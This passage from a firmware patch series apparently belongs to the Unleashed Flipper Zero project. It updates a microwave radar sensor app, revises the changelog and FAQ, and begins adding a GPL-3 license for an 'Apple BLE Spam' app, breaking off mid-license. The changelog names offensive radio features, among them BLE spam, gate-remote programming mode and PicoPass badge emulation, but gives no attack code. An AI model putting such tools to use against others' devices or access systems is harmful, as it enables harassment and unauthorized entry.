From 72fbca2986a79eeaa1c5fc67f1a442a04a817bdc Mon Sep 17 00:00:00 2001 From: MatthewKuKanich Date: Tue, 10 Oct 2023 00:26:52 -0400 Subject: [PATCH 01/20] altpinout + many updates --- .../external/radar_scanner/application.fam | 2 +- .../external/radar_scanner/radar_scanner.c | 71 +++++++++++++++---- 2 files changed, 59 insertions(+), 14 deletions(-) diff --git a/applications/external/radar_scanner/application.fam b/applications/external/radar_scanner/application.fam index 40b06c236..4c6d40047 100644 --- a/applications/external/radar_scanner/application.fam +++ b/applications/external/radar_scanner/application.fam @@ -9,6 +9,6 @@ App( fap_category="GPIO", fap_author="@MatthewKuKanich", fap_weburl="https://github.com/MatthewKuKanich/flipper-radar", - fap_version="1.0", + fap_version="2.0", fap_description="Detects the movement of living things using radar", ) diff --git a/applications/external/radar_scanner/radar_scanner.c b/applications/external/radar_scanner/radar_scanner.c index 8f0d4bd96..0f1792953 100644 --- a/applications/external/radar_scanner/radar_scanner.c +++ b/applications/external/radar_scanner/radar_scanner.c @@ -10,10 +10,14 @@ static const uint32_t EVENT_PERIOD_MS = 10; static const float BEEP_FREQ = 1000.0f; static const float BEEP_VOL = 0.9f; static const GpioPin* const radarPin = &gpio_ext_pc3; // Pin 7 +static const GpioPin* const altRadarPin = &gpio_ext_pa7; // Pin 2 +static const GpioPin* const altGroundPin = &gpio_ext_pa6; // Pin 3 bool presenceDetected = false; bool muted = false; bool active = false; +bool continuous = false; // Start with no signal from OUT +bool altPinout; // Sets which GPIO pinout config to use static void start_feedback(NotificationApp* notifications) { // Set LED to red for detection @@ -50,7 +54,7 @@ static void draw_callback(Canvas* canvas, void* ctx) { canvas_clear(canvas); canvas_set_font(canvas, FontPrimary); elements_multiline_text_aligned(canvas, 64, 2, AlignCenter, AlignTop, "Microwave Radar"); - + canvas_set_font(canvas, FontSecondary); if(active) { elements_multiline_text_aligned(canvas, 64, 12, AlignCenter, AlignTop, "Active"); } else { @@ -58,22 +62,36 @@ static void draw_callback(Canvas* canvas, void* ctx) { } // Display presence status + canvas_set_font(canvas, FontPrimary); if(presenceDetected) { elements_multiline_text_aligned( - canvas, 64, 25, AlignCenter, AlignTop, "Presence Detected"); + canvas, 64, 20, AlignCenter, AlignTop, "Presence Detected"); } else { - elements_multiline_text_aligned(canvas, 64, 25, AlignCenter, AlignTop, "No Presence"); - } - - if(muted) { - elements_multiline_text_aligned(canvas, 64, 35, AlignCenter, AlignTop, "Muted"); + elements_multiline_text_aligned(canvas, 64, 20, AlignCenter, AlignTop, "No Presence"); } canvas_set_font(canvas, FontSecondary); - elements_multiline_text_aligned( - canvas, 64, 45, AlignCenter, AlignTop, "RCWL-0516 :: OUT -> Pin7"); - elements_multiline_text_aligned( - canvas, 64, 55, AlignCenter, AlignTop, "VIN -> 5v :: GND -> GND"); + if(muted) { + elements_multiline_text_aligned(canvas, 64, 32, AlignCenter, AlignTop, "Muted"); + } + + canvas_set_font(canvas, FontBatteryPercent); + + if(altPinout) { + elements_multiline_text_aligned( + canvas, 64, 42, AlignCenter, AlignTop, "Alt-Pinout Enabled"); + elements_multiline_text_aligned( + canvas, 64, 49, AlignCenter, AlignTop, "VIN -> 5v :: GND -> Pin 3"); + elements_multiline_text_aligned( + canvas, 64, 56, AlignCenter, AlignTop, "OUT -> Pin 2 (A7)"); + } else if(!altPinout) { + elements_multiline_text_aligned( + canvas, 64, 42, AlignCenter, AlignTop, "Alt-Pinout Disabled"); + elements_multiline_text_aligned( + canvas, 64, 49, AlignCenter, AlignTop, "VIN -> 5v :: GND -> GND"); + elements_multiline_text_aligned( + canvas, 64, 56, AlignCenter, AlignTop, "OUT -> Pin 7 (C3)"); + } } static void input_callback(InputEvent* input_event, void* ctx) { @@ -82,6 +100,14 @@ static void input_callback(InputEvent* input_event, void* ctx) { furi_message_queue_put(event_queue, input_event, FuriWaitForever); } +static void get_reading() { + if(altPinout) { + continuous = furi_hal_gpio_read(altRadarPin); + } else { + continuous = furi_hal_gpio_read(radarPin); + } +} + int32_t app_radar_scanner(void* p) { UNUSED(p); FuriMessageQueue* event_queue = furi_message_queue_alloc(8, sizeof(InputEvent)); @@ -102,6 +128,17 @@ int32_t app_radar_scanner(void* p) { // set input to be low; RCWL-0516 outputs High (3v) on detection furi_hal_gpio_init(radarPin, GpioModeInput, GpioPullDown, GpioSpeedVeryHigh); + furi_hal_gpio_init(altRadarPin, GpioModeInput, GpioPullDown, GpioSpeedVeryHigh); + furi_hal_gpio_init(altGroundPin, GpioModeOutputPushPull, GpioPullNo, GpioSpeedVeryHigh); + furi_hal_gpio_write(altGroundPin, false); + + // Auto 5v- Thanks Willy!! + uint8_t attempts = 0; + bool otg_was_enabled = furi_hal_power_is_otg_enabled(); + while(!furi_hal_power_is_otg_enabled() && attempts++ < 5) { + furi_hal_power_enable_otg(); + furi_delay_ms(10); + } bool alarming = false; // Sensor begins in-active until user starts bool running = true; // to prevent unwanted false positives @@ -109,7 +146,7 @@ int32_t app_radar_scanner(void* p) { while(running) { if(active) { // start and stop feedback if sensor state is active - bool continuous = furi_hal_gpio_read(radarPin); + get_reading(); if(continuous && !alarming) { presenceDetected = true; @@ -138,6 +175,9 @@ int32_t app_radar_scanner(void* p) { muted = !muted; // Toggle the value of 'muted' stop_feedback(notifications); } + if(event.key == InputKeyRight) { + altPinout = !altPinout; // Toggle alternate pinout + } } } } @@ -146,6 +186,11 @@ int32_t app_radar_scanner(void* p) { stop_feedback(notifications); notification_message_block(notifications, &sequence_display_backlight_enforce_auto); + // Disable 5v power + if(furi_hal_power_is_otg_enabled() && !otg_was_enabled) { + furi_hal_power_disable_otg(); + } + view_port_enabled_set(view_port, false); gui_remove_view_port(gui, view_port); view_port_free(view_port); @@ -155,4 +200,4 @@ int32_t app_radar_scanner(void* p) { furi_record_close(RECORD_NOTIFICATION); return 0; -} +} \ No newline at end of file From 327690b90aae6100b5e9779f4e8a36a66e51311a Mon Sep 17 00:00:00 2001 From: WillyJL <49810075+Willy-JL@users.noreply.github.com> Date: Tue, 10 Oct 2023 19:59:43 +0100 Subject: [PATCH 02/20] Update radar_scanner.c --- applications/external/radar_scanner/radar_scanner.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/applications/external/radar_scanner/radar_scanner.c b/applications/external/radar_scanner/radar_scanner.c index 0f1792953..ec9971de3 100644 --- a/applications/external/radar_scanner/radar_scanner.c +++ b/applications/external/radar_scanner/radar_scanner.c @@ -132,7 +132,7 @@ int32_t app_radar_scanner(void* p) { furi_hal_gpio_init(altGroundPin, GpioModeOutputPushPull, GpioPullNo, GpioSpeedVeryHigh); furi_hal_gpio_write(altGroundPin, false); - // Auto 5v- Thanks Willy!! + // Auto 5v power uint8_t attempts = 0; bool otg_was_enabled = furi_hal_power_is_otg_enabled(); while(!furi_hal_power_is_otg_enabled() && attempts++ < 5) { @@ -200,4 +200,4 @@ int32_t app_radar_scanner(void* p) { furi_record_close(RECORD_NOTIFICATION); return 0; -} \ No newline at end of file +} From 130fa43ad689ebf0ee6fdd0ef0758331215d5391 Mon Sep 17 00:00:00 2001 From: MX <10697207+xMasterX@users.noreply.github.com> Date: Wed, 11 Oct 2023 01:25:36 +0300 Subject: [PATCH 03/20] update changelog --- CHANGELOG.md | 71 ++++++++++++++++---------------------------- documentation/FAQ.md | 2 +- 2 files changed, 26 insertions(+), 47 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 93988b537..b0a3c0d05 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,50 +1,29 @@ ## New changes -* **Apple BLE Spam app** (by @Willy-JL | Plus research from ECTO-1A, xMasterX and techryptic) -> (app can be found in builds ` `, `e`, `n`, `r`) -* Plugins -> Note for new users: **PicoPass emulation is available** in (Apps -> NFC -> PicoPass) + Latest PicoPass emulation fixes (by nvx) -> (app can be found in builds ` `, `e`, `n`, `r`) -* SubGHz: **FAAC SLH - Programming mode** (by @xMasterX & @Eng1n33r (full research and PoC by @Skorpionm)| PR #585) -> [How to use](https://github.com/DarkFlippers/unleashed-firmware/blob/dev/documentation/SubGHzRemoteProg.md) -* SubGHz: FAAC SLH -> Add manually new options -* SubGHz: **Ignore Princeton** option -* SubGHz: **Save all settings, option to reset config to default** (by @derskythe | PR #590) -* SubGHz: Fix 0xFFFF counter value being skipped -* SubGHz: Fix path reset on save name scene exit -* SubGHz: Various fixes -* SubGHz Remote: New design (by @Svaarich) - Implemented by @gid9798 -* SubGHz Remote: Fix Sub-GHz Remote folder name (by @OperKH | PR #583) -* SubGHz Remote: submodule (by @gid9798 | PR #592) -* Infrared: Updated universal assets (by @amec0e | PR #594) -* Infrared: Remake custom universal remotes to use new design (New icons by @Svaarich) -* UI: Keyboard ok to toggle select all in cursor mode (by @Willy-JL) -* CI/CD: CodeQL for internal usage -* CI/CD: Fixed regular builds having `c` in version name in the device info while not being actual `c` build -* Docs: New FAAC SLH instructions -* Docs: Readme & Changelog fixes (by @gid9798 | PR #586 #600) -* OFW: Sub-GHz: fix incorrect key parsing crash -* OFW: fbt: added FW_CFG_name with build configuration -* OFW: SD-Card: proper HAL -> **Breaking API change, API 37.x -> API 38.x** - **Update your apps!** -* OFW: Various Fixes and Improvements -> **Breaking API change, API 36.x -> API 37.x** - **Update your apps!** -* OFW: iButton: Return to the file selection if file is corrupted -* OFW: Account for the "-" in line carry-over -* OFW: github: workflow improvements -* OFW: Storage: force mount -* OFW: Add File Naming setting for more detailed naming -> **Breaking API change, API 35.x -> API 36.x** - **Update your apps!** -* OFW: Disconnect from BLE on protobuf error -* OFW: Add support for Mifare Classic 4k SAK 0x38 ATQA 0x02, 0x04, 0x08 -* OFW: Undo some TODO -* OFW: Check the filetype of the update manifest -* OFW: StorageListRequest: size filter -* OFW: SubGhz: heap overflow text error -* OFW: nfc: add rfal wrong state error handling -* OFW: Rfid: fix crash on broken key launch from archive (fix was already done in UL in similar way) -* OFW: AC OFF button -* OFW: New IR universal remote graphics -* OFW: Intelligent probing with warnings for fwflash.py -* OFW: FuriHal: explicitly pull display pins at early init stage, move PUPD config to early stage -* OFW: Fix display last symbol in multiline text -* OFW: Properly reset the NFC device data -* OFW: fbt: various improvements and bug fixes -* OFW: Littlefs updated to v2.7.0 -* OFW: loader: restored support for debug apps -* OFW: Removed explicit dependency on scons for external scripting +**Summary: BLE Core2 (Copro) crashes should be fixed with this update, Apple BLE Spam app and other apps updated to the latest versions, NFC file sort crashes has been fixed, other fixes and improvements see below:** +* SubGHz: Nice Flor S - added custom button code 0x3 +* NFC: Fixes out of memory crash if we open folder with more than 300 files in it +* LF RFID: Fixed logic in `t5577_write_with_pass` (by @baugp | PR #612) +* Infrared: Updated universal assets (by @amec0e | PR #607 #619) +* **Apple BLE Spam app** updated to latest version (by @Willy-JL) -> (app can be found in builds ` `, `e`, `n`, `r`) +* OFW: Fix spelling across some project files +* OFW: CCID: Support PC To Reader Transfer Block data +* OFW: Firmware: bigger thread name storage. Notification app: better BacklightEnforce edge cases handling. +* OFW: Lib: update stm32wb_copro to 1.17.3 release +* OFW: FuriHal ble: length fix for fw version prop +* OFW: add documentation SubGhz Bin_RAW file format +* OFW: fbt: glob improvements +* OFW: HEX input UI improvements +* OFW: Ble: fix null-ptr dereference in bt_change_profile +* OFW: Add the coding in the shell animation +* OFW: FuriHal,BleGlue: prevent sleep while HCI command executed, proper bt api rpc locking. Fixes random system lockups. +* OFW: fbt: reworked tool path handling +* OFW: Gui: handle view port lockup and notify developer about it +* OFW: Added `fal_embedded` parameter for PLUGIN apps +* OFW: Fix multiline aligned text going out of bounds (again) +* OFW: Add Initial CCID support +* OFW: Add confirmation before exiting USB-UART +* OFW: Add extended I2C HAL functions -> **Breaking API change 38.x -> 39.x** +* OFW: New clock switch schema, **fixes random core2 crashes** ---- diff --git a/documentation/FAQ.md b/documentation/FAQ.md index 42346d125..8f912c517 100644 --- a/documentation/FAQ.md +++ b/documentation/FAQ.md @@ -25,7 +25,7 @@ https://github.com/DarkFlippers/unleashed-firmware#whats-changed ## How to use SubGHz Remote app? 1. Open app, press Back button, select New map file -2. Configure signal files and their names for every button (you add only one signal and make other buttons empty - just don't select any files for them in config) +2. Configure signal files and their names for every button (also you can add only one signal and make other buttons empty - just don't select any files for them in config) 3. Save new map file 4. Open map file and select your previously created file 5. Use buttons to send subghz signal files that you selected in map config at step 2 From 862808f054ce953818b186750e82abb55c169b79 Mon Sep 17 00:00:00 2001 From: Willy-JL <49810075+Willy-JL@users.noreply.github.com> Date: Wed, 11 Oct 2023 16:19:30 +0100 Subject: [PATCH 04/20] Backport changes from apps repo for now --- applications/external/apple_ble_spam/LICENSE | 674 ++++++++++++++++++ .../external/apple_ble_spam/application.fam | 10 +- 2 files changed, 679 insertions(+), 5 deletions(-) create mode 100644 applications/external/apple_ble_spam/LICENSE diff --git a/applications/external/apple_ble_spam/LICENSE b/applications/external/apple_ble_spam/LICENSE new file mode 100644 index 000000000..f288702d2 --- /dev/null +++ b/applications/external/apple_ble_spam/LICENSE @@ -0,0 +1,674 @@ + GNU GENERAL PUBLIC LICENSE + Version 3, 29 June 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU General Public License is a free, copyleft license for +software and other kinds of works. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +the GNU General Public License is intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. We, the Free Software Foundation, use the +GNU General Public License for most of our software; it applies also to +any other work released this way by its authors. You can apply it to +your programs, too. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + To protect your rights, we need to prevent others from denying you +these rights or asking you to surrender the rights. Therefore, you have +certain responsibilities if you distribute copies of the software, or if +you modify it: responsibilities to respect the freedom of others. + + For example, if you distribute copies of such a program, whether +gratis or for a fee, you must pass on to the recipients the same +freedoms that you received. You must make sure that they, too, receive +or can get the source code. And you must show them these terms so they +know their rights. + + Developers that use the GNU GPL protect your rights with two steps: +(1) assert copyright on the software, and (2) offer you this License +giving you legal permission to copy, distribute and/or modify it. + + For the developers' and authors' protection, the GPL clearly explains +that there is no warranty for this free software. For both users' and +authors' sake, the GPL requires that modified versions be marked as +changed, so that their problems will not be attributed erroneously to +authors of previous versions. + + Some devices are designed to deny users access to install or run +modified versions of the software inside them, although the manufacturer +can do so. This is fundamentally incompatible with the aim of +protecting users' freedom to change the software. The systematic +pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we +have designed this version of the GPL to prohibit the practice for those +products. If such problems arise substantially in other domains, we +stand ready to extend this provision to those domains in future versions +of the GPL, as needed to protect the freedom of users. + + Finally, every program is threatened constantly by software patents. +States should not allow patents to restrict development and use of +software on general-purpose computers, but in those that do, we wish to +avoid the special danger that patents applied to a free program could +make it effectively proprietary. To prevent this, the GPL assures that +patents cannot be used to render the program non-free. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. + + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. + + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. + + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as expressly +provided under this License. Any attempt otherwise to propagate or +modify it is void, and will automatically terminate your rights under +this License (including any patent licenses granted under the third +paragraph of section 11). + + However, if you cease all violation of this License, then your +license from a particular copyright holder is reinstated (a) +provisionally, unless and until the copyright holder explicitly and +finally terminates your license, and (b) permanently, if the copyright +holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + + Moreover, your license from a particular copyright holder is +reinstated permanently if the copyright holder notifies you of the +violation by some reasonable means, this is the first time you have +received notice of violation of this License (for any work) from that +copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + + Termination of your rights under this section does not terminate the +licenses of parties who have received copies or rights from you under +this License. If your rights have been terminated and not permanently +reinstated, you do not qualify to receive new licenses for the same +material under section 10. + + 9. Acceptance Not Required for Having Copies. + + You are not required to accept this License in order to receive or +run a copy of the Program. Ancillary propagation of a covered work +occurring solely as a consequence of using peer-to-peer transmission +to receive a copy likewise does not require acceptance. However, +nothing other than this License grants you permission to propagate or +modify any covered work. These actions infringe copyright if you do +not accept this License. Therefore, by modifying or propagating a +covered work, you indicate your acceptance of this License to do so. + + 10. Automatic Licensing of Downstream Recipients. + + Each time you convey a covered work, the recipient automatically +receives a license from the original licensors, to run, modify and +propagate that work, subject to this License. You are not responsible +for enforcing compliance by third parties with this License. + + An "entity transaction" is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an +organization, or merging organizations. If propagation of a covered +work results from an entity transaction, each party to that +transaction who receives a copy of the work also receives whatever +licenses to the work the party's predecessor in interest had or could +give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if +the predecessor has it or can get it with reasonable efforts. + + You may not impose any further restrictions on the exercise of the +rights granted or affirmed under this License. For example, you may +not impose a license fee, royalty, or other charge for exercise of +rights granted under this License, and you may not initiate litigation +(including a cross-claim or counterclaim in a lawsuit) alleging that +any patent claim is infringed by making, using, selling, offering for +sale, or importing the Program or any portion of it. + + 11. Patents. + + A "contributor" is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The +work thus licensed is called the contributor's "contributor version". + + A contributor's "essential patent claims" are all patent claims +owned or controlled by the contributor, whether already acquired or +hereafter acquired, that would be infringed by some manner, permitted +by this License, of making, using, or selling its contributor version, +but do not include claims that would be infringed only as a +consequence of further modification of the contributor version. For +purposes of this definition, "control" includes the right to grant +patent sublicenses in a manner consistent with the requirements of +this License. + + Each contributor grants you a non-exclusive, worldwide, royalty-free +patent license under the contributor's essential patent claims, to +make, use, sell, offer for sale, import and otherwise run, modify and +propagate the contents of its contributor version. + + In the following three paragraphs, a "patent license" is any express +agreement or commitment, however denominated, not to enforce a patent +(such as an express permission to practice a patent or covenant not to +sue for patent infringement). To "grant" such a patent license to a +party means to make such an agreement or commitment not to enforce a +patent against the party. + + If you convey a covered work, knowingly relying on a patent license, +and the Corresponding Source of the work is not available for anyone +to copy, free of charge and under the terms of this License, through a +publicly available network server or other readily accessible means, +then you must either (1) cause the Corresponding Source to be so +available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner +consistent with the requirements of this License, to extend the patent +license to downstream recipients. "Knowingly relying" means you have +actual knowledge that, but for the patent license, your conveying the +covered work in a country, or your recipient's use of the covered work +in a country, would infringe one or more identifiable patents in that +country that you have reason to believe are valid. + + If, pursuant to or in connection with a single transaction or +arrangement, you convey, or propagate by procuring conveyance of, a +covered work, and grant a patent license to some of the parties +receiving the covered work authorizing them to use, propagate, modify +or convey a specific copy of the covered work, then the patent license +you grant is automatically extended to all recipients of the covered +work and works based on it. + + A patent license is "discriminatory" if it does not include within +the scope of its coverage, prohibits the exercise of, or is +conditioned on the non-exercise of one or more of the rights that are +specifically granted under this License. You may not convey a covered +work if you are a party to an arrangement with a third party that is +in the business of distributing software, under which you make payment +to the third party based on the extent of your activity of conveying +the work, and under which the third party grants, to any of the +parties who would receive the covered work from you, a discriminatory +patent license (a) in connection with copies of the covered work +conveyed by you (or copies made from those copies), or (b) primarily +for and in connection with specific products or compilations that +contain the covered work, unless you entered into that arrangement, +or that patent license was granted, prior to 28 March 2007. + + Nothing in this License shall be construed as excluding or limiting +any implied license or other defenses to infringement that may +otherwise be available to you under applicable patent law. + + 12. No Surrender of Others' Freedom. + + If conditions are imposed on you (whether by court order, agreement or +otherwise) that contradict the conditions of this License, they do not +excuse you from the conditions of this License. If you cannot convey a +covered work so as to satisfy simultaneously your obligations under this +License and any other pertinent obligations, then as a consequence you may +not convey it at all. For example, if you agree to terms that obligate you +to collect a royalty for further conveying from those to whom you convey +the Program, the only way you could satisfy both those terms and this +License would be to refrain entirely from conveying the Program. + + 13. Use with the GNU 